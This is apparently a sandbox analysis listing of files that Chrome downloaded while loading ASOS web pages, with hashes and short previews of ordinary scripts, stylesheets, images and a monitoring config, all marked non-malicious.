                                                                                                                                                                                                                                                                                      Preview:"use strict";var _objectHasOwn=function(t,e){if(null==t)throw new TypeError("Cannot convert undefined or null to object");return Object.prototype.hasOwnProperty.call(Object(t),e)};define("bagsdk/global",[],(function(){return window})),define("bagsdk/utils/getInstanceEventBus",["jquery"],(function(t){if("function"==typeof t)return t({})})),define("bagsdk/utils/sdkInstanceAsyncLoader",["bagsdk/utils/getInstanceEventBus"],(function(t){const e={load:function(e,n,o,i){i.isBuild?o(e):(t.bagSdkInstantiated&&o(e),t.on("bagSdk:instanceReady",(function(){o(e)})))}};return e})),define("Asos.Commerce.Bag.Sdk",["bagsdk/global","bagsdk/utils/sdkInstanceAsyncLoader!dummyModuleName"],(function(t){return["asos","commerce","_bagSdkInstance"].reduce((function(t,e){if(void 0!==t)return t[e]}),t)})),define("bagsdk/config/configuration",[],(function(){return{}})),define("bagsdk/config/defaultConfiguration",["bagsdk/global"],(function(t){return{postMessageUrl:"https://"+t.location.hostname+"/bag/gateway/",ba
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2861
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.899673741861986
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:6iEECouYVFJ+3dAYolftq+1AMmwIT9RlUg4NiQwCAtm2Pj/9T9Z+BLwYaVulsnM+:6igHYvYolR1DdIT9RugWiQwCAp99iaVZ
                                                                                                                                                                                                                                                                                      MD5:7F0979E9A0C7CCD8B56C28C8EBA3AC03
                                                                                                                                                                                                                                                                                      SHA1:609FC9759AC7C45DFFE5A5187B291733A4CF801B
                                                                                                                                                                                                                                                                                      SHA-256:EFAEE361B8631ED1213F9795579DB451DA689380A4ACA4A741EBDC6F2F9C6499
                                                                                                                                                                                                                                                                                      SHA-512:16EF664F0E787A0CA5D0FE35B4C6DB3350919AA28DCC87C26BF18210B6B6E56A07CFC2138427535CCD00D70E14F99585870FE0359BD832F51FD36C476F17EBF7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...P...P............sRGB.........IDATx...o.G......1i.@h .C.....=...D.q.H..?..z..N......'.*..]+].S.,.?.T..A.^A.J9J.D..............{....:v^l.ewg.m?yf..gf...C...Zb..:>.p...T*.PQ./.M.(..b.[.Vq.l.G.....v..........f...=88.#..lgx.....+...Wc............../6[.UV..............^.,..._.<..1.r:...p8H.$b..g.UU.8.8'.Ib.H$.9....'.x!..........^.Y..fCU.b......s..7...w..\/2W=jjj...Fb..B..z.\.h......Q. ...-...J..-....:..>..E..n...{l...r2|.4..e..?_...fq@.f.A:GFF.q.Wo...d.|...R.;.ti.p..RQ.....n9..GS.N.."...h./?..EP...O....w3..LqJ.b.....7.w...4uH...=]...K..@O2.....p..js..f..(.....&.0)4D.v..y...>.U.....*.|O.....2.k.}..x....Tl.......Y..Wn....%+=K.ZDv.".Qj.-...5.}.....p...k6..'...H.T?...i.*...j..kc.v.~An.1......?:O.{4..0..da..p...5.....,.. QH....U.......%...Vy....../\.M..)y.._|...../.Tb3.9=mB..\.4.c...!u...~q.^|..2....m.......j.....n...<.Mx.We@t1.8..7(t.*..UJ.....EB.>..T...\....\.%^Jy+...=...=|.I...g.H.!.h...:<..Y..{g...%..%Q..G..F....mC#.N.W...E..-...'e..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (63485), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):68888
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1178772532048855
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:1Iyvfz9fG9ZzVt7zzwosL8zw/sLAzwCsL259soTYLZ4+j/o34ee2jIY1i4U6b6NR:pIpV9grleZd2HYLq+Toy2sIudz7f
                                                                                                                                                                                                                                                                                      MD5:4378A9141BD7C4D9124B7BCF03F14E43
                                                                                                                                                                                                                                                                                      SHA1:DBD10946E798756DDABA5B422DA035CFCBE56CEC
                                                                                                                                                                                                                                                                                      SHA-256:52E8C1449696319E0FE4B379D68FB4A1E11D9AB61EDD85E2D8720ACF7BDF8C2E
                                                                                                                                                                                                                                                                                      SHA-512:DDF10B0EFFBFFA3783CC59555B65F644B00FB494DEE3554F52CC60480F7148E64099EC0377F3C731A3AA980A10D68A5FA7990914423236220035B95C09505FAC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[856],{51578:(e,i,a)=>{a.r(i),a.d(i,{default:()=>v});var r=a(60141);const n=JSON.parse('{"accessibility_breadcrumbs":"br.dkrummer","accessibility_label_back":"Tilbage","accessibility_label_loading":"Indl.ser","accessibility_search_clear_text_button_description":"Ryd tekst","accessibility_skip_to_content":"G. til hovedindhold","asos_details":"ASOS-detaljer","burger_open_navigation_label":".bn navigationsmenu","country_selector_button_change_button":"Skift","country_selector_button_heading":"Shopper fra:","country_selector_button_locationtext":"Du er i","delivery_identifier_or":"Eller","dtc_atb_reservation_sellerchangemessage":"Vi har foretaget nogle lageropdateringer, og s.lgeren af din vare er .ndret. Den nye s.lgers priser og leveringstider kan v.re anderledes, s. tag et kig i din indk.bskurv.","errors_something_doesnt_look_right":"Hov! Der er noget galt.","footer_international_sites_label":"Nogle af vo
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):295269
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.287607195979462
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:J+uj2nY5JFTHuxxtRrE3utRFtROpITQiyHCDLFcB4lf2+XQ:dNzITQiyHCDLGB4lf28Q
                                                                                                                                                                                                                                                                                      MD5:ABDBABD2F2E147F7C92858569FC95BE9
                                                                                                                                                                                                                                                                                      SHA1:1D981E9CC072BC9D0F6091DED25D4C9BCCD7535A
                                                                                                                                                                                                                                                                                      SHA-256:C337D001B48BCC81F20ABA396A11C291491ED9DB78845E9F98D07985379E1CB9
                                                                                                                                                                                                                                                                                      SHA-512:80C1EA0B58CE9DCB284FF8D6A4C6B6AF510AF77A787DFF07E2B3D23BBDA6D09CE6754DBD6F3D10E84223B73E4552D0C4547DE89CB6DD591FD87CAEA7E9D8B3F5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://www.asos.com/assets/uilib/content-ui-library-5.0.0-d7a4d03f-39.css
                                                                                                                                                                                                                                                                                      Preview:.videoClickToPlay-controlsWrapper .videoClickToPlay-controls__toggle--fullScreen{background-image:url("data:image/svg+xml;charset%3DUS-ASCII,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3Csvg%20width%3D%2240px%22%20height%3D%2240px%22%20viewBox%3D%220%200%2040%2040%22%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%3E%20%20%20%20%20%20%20%20%3Ctitle%3Eicon_full_screen%3C%2Ftitle%3E%20%20%20%20%3Cdesc%3ECreated%20with%20Sketch.%3C%2Fdesc%3E%20%20%20%20%3Cdefs%3E%3C%2Fdefs%3E%20%20%20%20%3Cg%20id%3D%22Spec---updates-based-on-dev-feedback%22%20stroke%3D%22none%22%20stroke-width%3D%221%22%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%20%20%20%20%20%20%20%20%3Cg%20id%3D%22Video-Click-to-play%22%20transform%3D%22translate%28-759.000000%2C%20-6143.000000%29%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%3Cg%20id%3D%22icon_full_screen%22%20transform%3D%22translate%28755.000000%2C%206139.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):89501
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65468), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):112029
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.357404271714221
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:WnaL75lqzuFeK3wuTYrX6cFgPofbBpqqWz45jXDi+AW1zvPgNumBO0sTCteSjxzo:WnaL7rqzTVHfLuz4BXm+AAL0O0dNxzo
                                                                                                                                                                                                                                                                                      MD5:5B97548F6F6B9767B4D19A08C5BD4CF3
                                                                                                                                                                                                                                                                                      SHA1:726AF517288130BDF81F78C1EC4F4639082EA23E
                                                                                                                                                                                                                                                                                      SHA-256:11E9446D38BA64D35FFB413E19471E02C1E8CAB679D228FD774FB334E2904925
                                                                                                                                                                                                                                                                                      SHA-512:76071D6969C10CAA90FDF6A06FBAA20441A2E2FC67BFA12B4804F09AA84E1C80CB4C189FC07BF44F03C82641A5C22D41E077B6039B2F56C932B1973BD7BA98AE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:!function(){"use strict";const e=e=>{e.panel.style.height="auto",e.panel.height=e.panel.offsetHeight+"px",e.visible||(e.panel.style.height=0)},t=t=>{const r={visible:!1,animating:!1,panel:t.nextElementSibling,button:t.querySelector("button")};r.panel.setAttribute("style","display: block");(t=>{let r=window.innerWidth;e(t),window.addEventListener("resize",(()=>{r!=window.innerWidth&&(r=window.innerWidth,e(t))}))})(r),t.addEventListener("click",(e=>{e.preventDefault(),r.visible?(e=>{e.visible=!1,e.button.setAttribute("aria-expanded","false"),e.panel.setAttribute("aria-hidden","true"),e.button.classList.remove("open"),e.panel.style.height=0})(r):(e=>{e.visible=!0,e.button.classList.add("open"),e.button.setAttribute("aria-expanded","true"),e.panel.setAttribute("aria-hidden","false"),e.panel.style.height=e.panel.height})(r)}))},r=e=>{const t=window.innerWidth,[r,n,o]=(e=>{if(e>=736)return[40,".desktop-bottom",".hero-slug"];return[32,".mobile-bottom",".hero-slug-mobile"]})(t),a=e.querySelect
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (37946), with no line terminators
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):38002
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2633730377792345
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:5TTvyo0BZbguOlSoTPsrbFFBymqxZ+xnF54i/7M9et+PtaRoKm/ycfqr:RTvEZbguOUnoO
                                                                                                                                                                                                                                                                                      MD5:AC93E0F884509FA284C6B4050C14B1C2
                                                                                                                                                                                                                                                                                      SHA1:65F0342213FEB3BB2FB5262F6E83A9B152983AAD
                                                                                                                                                                                                                                                                                      SHA-256:2421B0D4979D69042E5549D4FF9C1BDADF6B75512C497E5C17381EFC15A6D1B5
                                                                                                                                                                                                                                                                                      SHA-512:329BD5816093E4BEE34FF5EE59C9DD1B7968E5F6757A7054B07D1D3730BDCA7EBAE34B0BFCB05FA7F0EB1202A9264DE815019C108E6C022576FF98078031662D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://assets.asosservices.com/asos-ui/sdk/bag-sdk-9.0.0.min.js
                                                                                                                                                                                                                                                                                      Preview:"use strict";var _objectHasOwn=function(t,e){if(null==t)throw new TypeError("Cannot convert undefined or null to object");return Object.prototype.hasOwnProperty.call(Object(t),e)};define("bagsdk/global",[],(function(){return window})),define("bagsdk/utils/getInstanceEventBus",["jquery"],(function(t){if("function"==typeof t)return t({})})),define("bagsdk/utils/sdkInstanceAsyncLoader",["bagsdk/utils/getInstanceEventBus"],(function(t){const e={load:function(e,n,o,i){i.isBuild?o(e):(t.bagSdkInstantiated&&o(e),t.on("bagSdk:instanceReady",(function(){o(e)})))}};return e})),define("Asos.Commerce.Bag.Sdk",["bagsdk/global","bagsdk/utils/sdkInstanceAsyncLoader!dummyModuleName"],(function(t){return["asos","commerce","_bagSdkInstance"].reduce((function(t,e){if(void 0!==t)return t[e]}),t)})),define("bagsdk/config/configuration",[],(function(){return{}})),define("bagsdk/config/defaultConfiguration",["bagsdk/global"],(function(t){return{postMessageUrl:"https://"+t.location.hostname+"/bag/gateway/",ba
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 44 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPljgtql/xl/k4E08up:6v/lhPCq17Tp
                                                                                                                                                                                                                                                                                      MD5:C25D4FF4FF288CF696E39B35C5530A38
                                                                                                                                                                                                                                                                                      SHA1:92D8EFEAE7AE538146A9217173A3DAF80710192D
                                                                                                                                                                                                                                                                                      SHA-256:3BC910F72113FE519AB98338EAD55529AFF507FA6B60F939ACC516DE1E23C1D4
                                                                                                                                                                                                                                                                                      SHA-512:DC8A9E8BCAE8CB5B62A70B6A9A18DDD80E56C86069023EE40EA8D9D8820251A8DA20D3D188DABC75FA6E4AA4DFA2ACB556BA6AF0AF211B44BFF168FCA33448DB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8d7d45361ad96c58/1729807550390/Mp4zHOK1XWJgEfH
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...,...O.............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1038)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1127
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.348239999385878
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:+cKBOSCtD1XwsZqIx7tK988dirEvW0NVy2hdp:+l0SCXqIxt98dirEvW0NVy2Lp
                                                                                                                                                                                                                                                                                      MD5:7F3A6A3D7F495B63DCB141D50B82F200
                                                                                                                                                                                                                                                                                      SHA1:4DDC1B543B837EF71AC8E9E267EE401CD94ECB16
                                                                                                                                                                                                                                                                                      SHA-256:8C14BC742C4B9E6B024585FF5EA867778291163C42D4476206EBD86CC44EAE3E
                                                                                                                                                                                                                                                                                      SHA-512:71F6764EDF5B8BF7E2903B8AFE48B473AB044450E3D65C8690F07882E019AA7AAF1631569290DEE0D5E62E9AABCE0D3AB4B5D4E7CB9C6186F4BC268A3477ED8D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:/*! v8.2.0, license file: uuid.LICENSE.txt */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define("uuid",e):(t=t||self).uuid=e()}(this,(function(){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto),e=new Uint8Array(16);function o(){if(!t)throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return t(e)}for(var n=[],r=0;r<256;++r)n.push((r+256).toString(16).substr(1));return function(t,e,r){var u=(t=t||{}).random||(t.rng||o)();if(u[6]=15&u[6]|64,u[8]=63&u[8]|128,e){r=r||0;for(var d=0;d<16;++d)e[r+d]=u[d];return e}return function(t,e){var o=e||0;return(n[t[o+0]]+n[t[o+1]]+n[t[o+2]]+n[t[o+3]]+"-"+n[t[o+4]]+n[t[o+5]]+"-"+n[t[o+6]]+n[t[o+7]]+"-"+n[t[o+8]]+n[t[o+9]]+"-"+n[t[o
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):3501
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                                                                                                                      MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                                                                      SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                                                                      SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                                                                      SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fwww.asosglobal.com
                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):7585
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.009531537221276
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Y12yEfgzqy/bDzp5LkuD8QAKnv+wrBANASYmharWsMx7lg9ruCnIz0byCvnHZsHI:xFvuUas5kWHaAobNVJR3jTPLW+F
                                                                                                                                                                                                                                                                                      MD5:B15DC9CA80BE69D8F0CC942B66CD551F
                                                                                                                                                                                                                                                                                      SHA1:44AFC39030F411C55660DCA71BD1D92987064655
                                                                                                                                                                                                                                                                                      SHA-256:2E1C1FACEC9C3F82188B4F355A432E29CD0CBB6E87B0FF6D5D521C8CA3DFEB93
                                                                                                                                                                                                                                                                                      SHA-512:A07F6C9DC070D19D69B6B0830B9B5AEDFC2BA234904E55DFA893958C557FA822C78D4B37FEBE0F38D1AAD4F8FB34BD20080663E36003CFDD2B00EA7746F60C4D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:{"h.key":"KEKMC-5QPEH-Y5FHE-8AH54-JDSN3","h.d":"asos.com","h.t":1729807637211,"h.cr":"17597d4564d2f16b0aff1426b5301cd7b95ac19b-e6f7476a-c58388ad","session_id":"62a3c2ba-3e19-49c8-b3d6-feeaae98d7f0","site_domain":"asos.com","beacon_url":"//684dd32a.akstat.io/","autorun":true,"instrument_xhr":true,"strip_query_string":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"Continuity":{"enabled":true,"waitAfterOnload":2000},"PageParams":{"xhr":"match","pageGroups":[{"type":"Regexp","parameter1":".*/.*/cat/\\?","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/search($|/|\\?)","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-error/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-unavailable/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/prd/","parameter2":"PDP","on":["navigation"]},{"type":
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65468)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):444312
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.498122014145305
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:i97ivfnqIPa5SpdJbk2TS8wnJBHeea7/iGnL6cpXyLKYNJmOmJzI6+y4:Aaq6ps2GR5akIXyLKYNb
                                                                                                                                                                                                                                                                                      MD5:B8703F9440BC82DACAE58C23092AEC96
                                                                                                                                                                                                                                                                                      SHA1:4023158882F54D01017E044235FA2CFFB6CE91E5
                                                                                                                                                                                                                                                                                      SHA-256:368A4497474DE0E4B802E9FCD183D294C0DDB27BBDF6A874A520CDE3CC11604C
                                                                                                                                                                                                                                                                                      SHA-512:1F9CDA25A81AF5313BABC6FC095CFE93EC6D92DB73306A814655F2A8C1682655DC6B9665529F7B7A47F9942E3605A51B4CB3C20F6EB8F2035AB3138460E9A61E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:/*! For license information please see client.min.js.LICENSE.txt */.(function(){var __webpack_modules__={5251:function(t,n,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendor",h="version",p="architecture",g="console",m="mobile",_="tablet",w="smarttv",y="wearable",b="embedded",E="Amazon",I="Apple",A="ASUS",T="BlackBerry",S="Firefox",k="Google",R="Huawei",C="LG",N="Microsoft",D="Motorola",O="Opera",x="Samsung",M="Sharp",P="Sony",L="Xiaomi",U="Zebra",V="Facebook",F=function(t){for(var n={},e=0;e<t.length;e++)n[t[e].toUpperCase()]=t[e];return n},B=function(t,n){return typeof t===s&&-1!==z(n).indexOf(z(t))},z=function(t){return t.toLowerCase()},j=function(t,n){if(typeof t===s)return t=t.replace(/^\s\s*/,""),typeof n===u?t:t.substring(0,350)},G=function(t,n){for(var e,i,r,u,s,f,l=0;l<n.length&&!s;){var d=n[l],v=n[l+1];for(e=i=0;e<d.length&&!s&&d[e];)if(s=d[e++].exec(t))for(r=0;r<v.length;r++)f=s[++i],typeof(u=v[r])==
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                      Size (bytes):374
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.0510364368274105
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:v4qoX0XB79i8eJOezXXhKvNsTX0XB79S66Oez114vN8K2GVgGgGVgAn:ANgBU8eJh0NIgB86jN8YVgGDVgAn
                                                                                                                                                                                                                                                                                      MD5:BF5AA10EBDE60125A2179D960233FE37
                                                                                                                                                                                                                                                                                      SHA1:F65FE06E09F0A755782A84514A2510038890D4D0
                                                                                                                                                                                                                                                                                      SHA-256:A7B639B0B8FF4EF237034146CEB8D34300864969212FECD5019CBAEB37B611FC
                                                                                                                                                                                                                                                                                      SHA-512:6C44ECDF2C324BB827A9C62D1D8535F3E0FB8311133691565B8040B0D32EA265EE802858F13862999B87000E7C5C571216DE6C20BADED9AC74761D40FBDE49CD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      URL:https://www.asos.com/manifest.json
